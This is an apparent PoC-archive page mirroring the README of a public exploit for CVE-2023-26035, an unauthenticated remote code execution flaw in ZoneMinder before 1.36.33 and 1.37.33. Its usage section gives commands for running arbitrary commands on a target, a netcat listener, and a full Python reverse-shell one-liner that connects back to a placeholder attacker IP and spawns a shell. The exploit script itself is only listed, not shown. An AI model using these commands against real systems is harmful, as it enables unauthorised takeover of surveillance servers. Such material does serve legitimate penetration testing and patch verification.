Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-26035 PoC — ZoneMinder vulnerable to Missing Authorization

Source
https://github.com/0xfalafel/zoneminder_CVE-2023-26035
Associated Vulnerability
Title:ZoneMinder vulnerable to Missing Authorization (CVE-2023-26035)
Description:ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There are no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id. This issue is fixed in This issue is fixed in versions 1.36.33 and 1.37.33.
Description
Exploit for CVE-2023-26035 affecting ZoneMinder < 1.36.33 and < 1.37.33
Readme
# Exploit - ZoneMinder CVE-2023-26035

There is a **Unauthenticated Remote Code Execution (RCE)** affecting **ZoneMinder** Snapshots.  
This is an **exploit** for CVE-2023-26035.

## Affected versions

ZoneMinder **< 1.36.33** and  
ZoneMinder **< 1.37.33**.

![Usage of the exploit](./demo.png)

## Usage

#### Check if the target is vulnerable:

    python3 zoneminder.py http://target

#### Execute a command

    python3 zoneminder.py http://target command


## Examples

#### Test command execution with `ping`

Run `tcpdump` on the interface connected to the target (here `tun0`) and filter for `ICMP` packets:

    sudo tcpdump -i tun0 icmp

Then execute a ping to your IP. Make sure to use quotes `"` as otherwise the command won't be interpreted correctly.

    python3 zoneminder.py http://target "ping -C 4 your_ip"

#### Reverse shell

Create the listener with netcat:

    nc -lvnp 1337

Use a reverse shell oneliner:

    python3 zoneminder.py http://TARGET "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"

More at https://revshells.com.

## Requirements

The exploit make use of **`requests`** and **`BeautifulSoup`**.
Install it with :

    python3 -m pip install requests beautifulsoup4

## Acknowledgements

I just wanted a standalone exploit that didn't require Metasploit.  
The script is derived of https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/zoneminder_snapshots.rb

https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr
File Snapshot

 [4.0K]  /data/pocs/c4789e4428047af177d42aebddd1196f627873b3
├── [ 77K]  demo.png
├── [1.6K]  README.md
└── [3.3K]  zoneminder.py

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →